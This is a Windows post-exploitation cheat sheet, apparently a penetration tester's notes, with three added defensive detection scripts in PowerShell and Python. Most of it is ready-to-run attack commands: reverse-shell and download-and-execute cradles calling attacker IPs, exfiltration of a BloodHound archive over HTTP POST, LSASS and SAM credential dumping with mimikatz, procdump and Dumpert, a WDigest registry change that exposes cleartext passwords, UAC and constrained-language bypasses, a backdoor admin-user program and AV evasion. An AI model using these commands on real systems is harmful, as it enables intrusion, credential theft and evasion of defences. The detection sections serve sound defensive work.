## ------------------| Method 01 (PowerShell v2 downgrade: needs .NET 2.0/3.5 installed; v2 has no CLM and no AMSI)
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/rev.ps1')

## ------------------| Method 02
## CLM still lets you run external binaries. `&{ ... }` is a script block; it behaves like wrapping the commands in a function, e.g. function test { whoami }
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
echo -e "Invoke-PowerShellTcp -Reverse -IPAddress <HostIP> -Port 4545" >> rev.ps1
python3 -m http.server 80
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0   
&{ powershell -enc JABzAG0...Sad== }

## ------------------| Using PsBypassCLM
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PSBypassCLM/PsBypassCLM.exe
### Execute
### Place the binary in C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\Windows\Tasks\PsBypassCLM.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.38 /rport=4545 /U C:\Windows\Tasks\PsBypassCLM.exe
```

* UAC Bypass

```bash
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

## Bypasing
https://github.com/hfiref0x/UACME
https://docs.h4rithd.com/windows/privilageesc-windows#01.-common-tricks    
```

### 01.9 Upload / Download / Execute

* Upload file.

```bash
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))     
Invoke-WebRequest -Uri http://10.10.14.25:443 -Method POST -Body $b64

## On the attacker: catch the POST (e.g. nc -lvnp 443), save the request body, then decode it
echo <base64> | base64 -d > bloodhound.zip

## ------------------| The Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql   
```

* Download file

```bash
## ------------------| Old version (support for any version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.63/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| New version (alias IWR)
powershell -c "Invoke-WebRequest http://10.10.14.26/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Executed in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/revshell.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/revshell.ps1 | iex"

## ------------------| Internet Explorer’s First Run error (-useBasicParsing)
powershell -c "IWR -useBasicParsing http://10.10.14.26/nc.exe -o C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f http://10.10.14.26/nc.exe C:\Users\Public\nc.exe

## ------------------| Using Curl (in Windows PowerShell `curl` is an alias of Invoke-WebRequest, not curl.exe)
powershell curl http://10.10.14.11/rev.ps1 -OutFile rev.ps1

## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe" 
```

* Execute file

```bash
## ------------------| Remote
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/SharpHound.ps1')

## ------------------| Local
.\rev.ps1
Import-Module .\rev.ps1
```

### 01.10 Encoding / Decoding

* Encoded Payload

```bash
## ------------------| Encode the payload 
echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0   

## ------------------| Run the payload
powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==
```
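Added example, not from the original page: the same `-EncodedCommand` encoding done from PowerShell itself (no `iconv` needed on the attacker side), plus the reverse operation a SOC analyst runs on a captured command line, unwrapping nested `-enc` layers. The sample command line is constructed inline for the demo; the regex covers the common spellings `-e`, `-ec`, `-enc` and `-EncodedCommand`.

```powershell
# Added example, not from the original page. The sample log line below is constructed.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)] [string] $Command)
    # powershell.exe expects UTF-16LE ("Unicode") before base64, not UTF-8
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string] $CommandLine,
        [int] $MaxDepth = 5                       # stop runaway unwrapping on malformed input
    )
    process {
        $current = $CommandLine
        for ($depth = 0; $depth -lt $MaxDepth; $depth++) {
            # -e / -ec / -enc / -encodedcommand (any case) followed by a base64 blob.
            # "-ep bypass" and "-ExecutionPolicy Bypass" do not match: no whitespace follows the "-e" there.
            if ($current -match '(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})') {
                try   { $bytes = [Convert]::FromBase64String($Matches[1]) }
                catch { break }                   # truncated log line: return what we have so far
                $current = [System.Text.Encoding]::Unicode.GetString($bytes)
            } else {
                break
            }
        }
        $current
    }
}

# Inner payload, then a second layer that launches it again with -enc (nesting seen in real droppers)
$inner = ConvertTo-EncodedCommand "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')"
$outer = ConvertTo-EncodedCommand "powershell -nop -w hidden -enc $inner"
$sampleLogLine = "powershell.exe -ExecutionPolicy Bypass -EncodedCommand $outer"   # constructed sample

ConvertFrom-EncodedCommand $sampleLogLine
```

Run the last line and the output is the original `IEX(...)` download cradle, two layers down. The same function works on the command line captured in Sysmon event 1 or Security event 4688 (with command-line auditing enabled), which is where this decoding is usually needed.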

* Encode file to base64

```bash
## ------------------| Method I (Windows PowerShell 5.x; PowerShell 7 uses -AsByteStream instead of -Encoding byte)
powershell -c [convert]::ToBase64String((cat C:\windows\system32\license.rtf -Encoding byte))

## ------------------| Method II
certutil -encode C:\windows\system32\license.rtf license-b64.out

## ------------------| Method III (text files; -Raw keeps the content as one string instead of an array of lines)
$fc = Get-Content "file name.txt" -Raw
$fc
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)
```

* Decode secure password (`SecureString`)

```bash
## ------------------| From an exported PSCredential (Export-CliXml)
$file = Import-CliXml -Path string.xml
$file.GetNetworkCredential().Password

## ------------------| From an exported SecureString (ConvertFrom-SecureString). It is DPAPI-protected, so only the same user on the same host can decrypt it
$pw = gc admin-pass.xml | ConvertTo-SecureString
$cred = New-Object System.Management.Automation.PSCredential("Administrator", $pw)
$cred.GetNetworkCredential() | fl * 

## ------------------| 
$user = "USERNAME"
$pass = "PASSWORD" 
$secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$secStringPass)
$cred | fl
$cred.GetNetworkCredential() | fl     
```

### 01.11 Dumping Credentials

* Dump `SAM` and `SYSTEM` files

```bash
REG SAVE HKLM\SYSTEM SYSTEM
REG SAVE HKLM\SAM SAM

# Get hashes
impacket-secretsdump -sam SAM -system SYSTEM local

impacket-secretsdump -sam SAM -system SYSTEM -history local 
```

* With [Out-Minidump.ps1](https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1)

```bash
wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1
IEX(New-Object Net.Webclient).DownloadString('http://<IP>/Out-Minidump.ps1')
Get-Process lsass | out-minidump
```

* With [Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)

```bash
## ------------------| Get PID
tasklist | findstr /i lsas

## ------------------| Dump to file
procdump64.exe -accepteula -ma <PID> lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

## ------------------| Extract hashes
pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords"
```

* With [Dumpert](https://github.com/outflanknl/Dumpert)

```bash
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.dll
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.exe

.\Outflank-Dumpert.exe
rundll32.exe C:\Windows\temp\Outflank-Dumpert.dll,Dump
```

* With Avast's [AvDump](https://github.com/f1tz/Misc/tree/master/AvDump)

```bash
## ------------------| Location
C:\Program Files\Avast Software\Avast\AvDump.exe

## ------------------| Download 
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x86/AvDump.exe
wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x64/AvDump.exe

## ------------------| Execute
.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Windows\temp\file.dmp

## ------------------| Metasploit post exploitation module 
post/windows/gather/avast_memory_dump
```

* With [SqlDumper](https://github.com/f1tz/Misc/tree/master/SqlDumper)

```bash
## ------------------| Download 
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x86.zip
wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x64.zip

## ------------------| Execute
.\sqldumper.exe [lsass's pid] 0 0x0110

## ------------------| Extract passwords
mimikatz.exe "log" "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
```

* LaZagne \[Firefox,Chrome]

```bash
wget https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe
.\laZagne.exe all
```

### 01.12 Other

* Copy file from `smb` server

```bash
## ------------------| Start SMB Server
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123      

## ------------------| Mount share using cmd
net use z: \\<MyIP>\share
net use z: \\<MyIP>\share /USER:h4rithd Password123

## ------------------| Mount share using powershell
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir

## ------------------| Direct copy
copy C:\Users\Public\sam \\10.10.14.26\share\sam
xcopy C:\Users\Public\sam \\10.10.14.26\share\sam
```

* Start `SMB` samba server on Linux for share files.

```bash
## ------------------| From using Impacket-smbserver 
impacket-smbserver share .
# if it gets error "Your system requires SMB2 or higher" then run below command
impacket-smbserver share . -smb2support 

## ------------------| Using the Linux Samba daemon (smbd)
## Backup current settings 
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
## Create the share directory and make it writable for the guest account
mkdir -p /tmp/smb
chmod 0777 /tmp/smb
## Append a guest-accessible share (a heredoc avoids echo's inconsistent backslash handling)
sudo tee -a /etc/samba/smb.conf > /dev/null <<EOF

#### --- $(hostname) added the lines below ----
[share]
    path = /tmp/smb
    public = yes
    writable = yes
    comment = $(hostname) shares
    printable = no
    guest ok = yes
#### --- Edit done -------
EOF
## Verify configs
tail -n 12 /etc/samba/smb.conf
testparm -s
## Start smb service
sudo service smbd restart

## ** Remember to revert the settings when done !!!
sudo cp /etc/samba/smb.conf.bak /etc/samba/smb.conf
sudo service smbd restart
```

* [RedTeam Cheatsheet](https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf)

```bash
## ------------------| Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

## ------------------| Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

## ------------------| Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

## ------------------| Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

## ------------------| Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

## ------------------| Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

## ------------------| PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

## ------------------| Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

## ------------------| Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

## ------------------| Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## ------------------| Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## ------------------| Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
```

## 02. Defense Evasion Techniques

* AV Evasion techniques (Invoke-Obfuscation)

```bash
## ------------------| Basic setup
git clone https://github.com/danielbohannon/Invoke-Obfuscation
cd Invoke-Obfuscation
pwsh
Import-Module ./Invoke-Obfuscation.psd1
cd /tmp
Invoke-Obfuscation

## ------------------| Obfuscate entire command via Encoding
SET SCRIPTPATH /tmp/revshell.ps1
ENCODING
5
OUT /tmp/enc.ps1

## ------------------| Obfuscate PowerShell Ast nodes (PS3.0+)
SET SCRIPTPATH /tmp/revshell.ps1
AST
ALL
1
OUT /tmp/enc.ps1
```
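On the defensive side, the encoded and obfuscated PowerShell that tools like Invoke-Obfuscation produce is usually visible in process command lines. The following Python is an added example, not from the original page and not part of Invoke-Obfuscation: it decodes an `-EncodedCommand` payload (base64 of UTF-16LE text, which is how powershell.exe defines that switch) and counts a few common obfuscation markers such as backtick escapes, string concatenation and the call operator applied to a quoted string. The sample command lines, the marker weights and the `3.0` threshold are constructed assumptions for this example.

```python
"""
Heuristics for spotting encoded or obfuscated PowerShell in process command
lines. Added example: not from the original page and not part of
Invoke-Obfuscation. Sample strings, marker weights and the threshold are
constructed assumptions for this example.
"""
import base64
import re
from typing import Dict, Optional

# -EncodedCommand and its common short forms (-e, -ec, -enc), followed by base64.
# powershell.exe decodes that argument as base64 of UTF-16LE text.
_ENC_SWITCH = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# Obfuscation markers: regex and weight (weights are an assumption of this example).
_MARKERS = {
    # backtick escapes inside a command name, e.g. W`h`e`r`e
    "backtick_escape": (re.compile(r"`[A-Za-z]"), 1.0),
    # string fragments glued together with +, e.g. ('Ge'+'t-Pro'+'cess')
    "string_concat": (re.compile(r"'[^']*'\s*\+\s*(?=')"), 1.0),
    # characters built from numeric codes, e.g. [char]71
    "char_cast": (re.compile(r"(?i)\[char\]\s*\d+"), 1.0),
    # -join or the -f format operator used to reassemble a string
    "join_or_format": (re.compile(r"(?i)-join\b|\)\s*-f\s"), 0.5),
    # call operator applied to a quoted string: &('...') or .('...')
    "call_op_on_string": (re.compile(r"[&.]\s*\(\s*['\"]"), 2.0),
    # long base64-looking blob embedded in the script body
    "base64_blob": (re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"), 1.5),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = _ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def obfuscation_markers(script: str) -> Dict[str, int]:
    """Count each marker that occurs at least once in the script text."""
    counts: Dict[str, int] = {}
    for name, (pattern, _weight) in _MARKERS.items():
        n = len(pattern.findall(script))
        if n:
            counts[name] = n
    return counts


def obfuscation_score(script: str) -> float:
    """Weighted sum of marker hits; higher means more obfuscation-like constructs."""
    return sum(_MARKERS[name][1] * n for name, n in obfuscation_markers(script).items())


def is_suspicious(cmdline: str, threshold: float = 3.0) -> bool:
    """Decode -EncodedCommand if present, then score the text that would actually run."""
    text = decode_encoded_command(cmdline) or cmdline
    return obfuscation_score(text) >= threshold


# Constructed samples (benign commands, so only the detection side is shown).
PLAIN = 'powershell.exe -NoProfile -Command "Get-Process | Where-Object {$_.Name -like \'chrome\'}"'
OBFUSCATED = (
    'powershell.exe -NoProfile -Command "&(\'Ge\'+\'t-Pro\'+\'cess\') | '
    'W`h`e`r`e-Object {$_.Name -like (\'chr\'+\'ome\')}"'
)
# base64(UTF-16LE("Get-Process")), the form powershell.exe -EncodedCommand consumes
ENCODED = "powershell.exe -NoProfile -enc RwBlAHQALQBQAHIAbwBjAGUAcwBzAA=="

if __name__ == "__main__":
    for sample in (PLAIN, OBFUSCATED, ENCODED):
        decoded = decode_encoded_command(sample)
        text = decoded or sample
        print(f"suspicious={is_suspicious(sample)!s:5} score={obfuscation_score(text):4.1f} "
              f"markers={obfuscation_markers(text)} decoded={decoded!r}")
```

The score is deliberately a raw weighted count rather than a normalised value, so a long benign script with one stray backtick stays near zero while a short command built entirely from concatenated fragments crosses the threshold quickly; tune the weights and threshold against your own baseline of legitimate administrative scripts before alerting on them.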

* Evasion with Shellter

```bash
shellter
A    ## A = automatic mode; choose manual mode instead if you want to pick the injection point yourself
```

## 03. Scripts

* Add a new local administrator user with a small C program (cross-compiled on Linux with MinGW)

```c
#include <stdlib.h>

/* Creates a local user and adds it to the Administrators group by shelling
 * out to net.exe; system() returns the exit status of each command. */
int main(void)
{
    int rc;
    rc = system("net user h4rithd Password! /add");
    if (rc != 0)
        return rc;
    rc = system("net localgroup administrators h4rithd /add");
    return rc;
}

/* Cross-compile on Linux: i686-w64-mingw32-gcc adduser.c -o adduser.exe */
```

* Get-ServiceACL.ps1

```bash
# download Get-ServiceACL.ps1 to the box and execute in memory
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.2/GetServiceACL.ps1',$false);$h.send();iex $h.responseText

# examine nscp service ACL
"nscp" | Get-ServiceAcl | select -ExpandProperty Access
```

* Invoke-TSPingSweep.ps1

```bash
wget https://raw.githubusercontent.com/dwj7738/My-Powershell-Repository/master/Scripts/Invoke-TSPingSweep.ps1

IEX(New-Object Net.WebClient).downloadString('http://10.8.0.74/Invoke-TSPingSweep.ps1')
Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
```

* [Invoke-Portscan.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1)

```bash
## ------------------| Scan port 22
Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" }   

## ------------------| Scan other ports
Invoke-Portscan -Hosts 172.16.249.202 -Ports '21,22,80,443,8080'
```

* [Invoke-AESEncryption.ps1](https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions/Invoke-AESEncryption.ps1)

```bash
## ------------------| Import-Module
Import-Module .\Invoke-AESEncryption.ps1

## ------------------| Encrypt 
Invoke-AESEncryption -Mode Encrypt -Key "h4rithd" -Path .\PlainText.txt

## ------------------| Decrypt 
Invoke-AESEncryption -Mode Decrypt -Key "h4rithd" -Path .\ciphertext.txt.aes
```

* [wget](https://superuser.com/questions/25538/how-to-download-files-from-command-line-in-windows-like-wget-or-curl/373068)-style scripts (JScript and VBScript) for downloading a file on Windows.

```bash
## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://10.10.14.25/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://10.10.14.25/nc.exe nc.exe
```
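The download cradles in the RedTeam cheatsheet block above, the `net user` / `net localgroup` calls in the adduser program, and the `cscript` download scripts here all leave recognisable process command lines. The following Python is an added example, not from the original page and not part of any tool it lists: a small rule set run over constructed command-line samples (the kind of data found in the `CommandLine` field of Sysmon Event ID 1 or Windows Security Event 4688) that flags those patterns and, as a sanity check, leaves the benign lines and the WDigest remediation value alone. The rule names, regexes, sample lines and the `10.0.0.5` address are assumptions constructed for this example.

```python
"""
Command-line detection rules for the techniques listed in this section
(download cradles, WDigest cleartext enablement, script-host downloaders and
local admin creation). Added example: not from the original page and not part
of any tool it lists. Rule names, regexes and sample lines are constructed
assumptions; input is assumed to be process command lines such as the
CommandLine field of Sysmon Event ID 1 or Security Event 4688.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based index into the scanned list
    rule: str      # rule name from RULES
    evidence: str  # the matched fragment, truncated for display


# (rule name, compiled pattern, what it indicates)
RULES = [
    ("ps_download_cradle",
     re.compile(r"(?i)Net\.WebClient\)?\.DownloadString\("),
     "PowerShell WebClient download cradle"),
    ("ps_exec_policy_bypass",
     re.compile(r"(?i)\s-(?:exec|ex|executionpolicy)\s+bypass\b"),
     "ExecutionPolicy bypass passed on the command line"),
    ("ps_iex_download",
     re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b.*\bDownloadString\b"),
     "downloaded text executed directly with Invoke-Expression"),
    ("wdigest_cleartext_enable",
     re.compile(r"(?i)\breg(?:\.exe)?\s+add\b.*SecurityProviders\\WDigest\b.*UseLogonCredential\b.*\s/d\s+1\b"),
     "WDigest UseLogonCredential set to 1 (LSASS keeps cleartext passwords)"),
    ("script_host_url_download",
     re.compile(r"(?i)\b[cw]script(?:\.exe)?\b.*\.(?:js|vbs)\b.*https?://"),
     "cscript/wscript given a script plus a URL argument"),
    ("msxml_xmlhttp_iex",
     re.compile(r"(?i)Msxml2\.XMLHTTP\b.*\biex\b"),
     "COM XMLHTTP download executed in memory"),
    ("local_admin_added",
     re.compile(r"(?i)\bnet(?:1|\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
     "account added to the local Administrators group"),
]


def scan_command_lines(lines: List[str]) -> List[Finding]:
    """Run every rule over every line; one line may produce several findings."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        for name, pattern, _why in RULES:
            m = pattern.search(line)
            if m:
                findings.append(Finding(n, name, m.group(0)[:60]))
    return findings


def rules_hit(lines: List[str]) -> List[str]:
    """Sorted, de-duplicated rule names triggered by the input."""
    return sorted({f.rule for f in scan_command_lines(lines)})


# Constructed sample command lines; 10.0.0.5 is a placeholder address.
SAMPLE_LINES = [
    'powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'http://10.0.0.5/s.ps1\')"',
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1",
    "cscript /nologo wget.js http://10.0.0.5/tool.exe tool.exe",
    "net localgroup administrators svc_backup /add",
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",          # benign
    r"cscript /nologo C:\Windows\System32\slmgr.vbs /dlv",                   # benign, no URL
    'powershell.exe -c "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open(\'GET\',\'http://10.0.0.5/a.ps1\',$false);$h.send();iex $h.responseText"',
]

if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.rule:26} {f.evidence!r}")
```

Each rule is intentionally narrow enough to explain in one sentence, which is what makes the alert actionable: line 1 trips three separate rules (cradle, policy bypass, in-memory execution), the registry rule only fires on `/d 1` and not on the `/d 0` value you would set to remediate, and the script-host rule needs both a `.js`/`.vbs` script and a URL so routine `slmgr.vbs` runs stay quiet.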

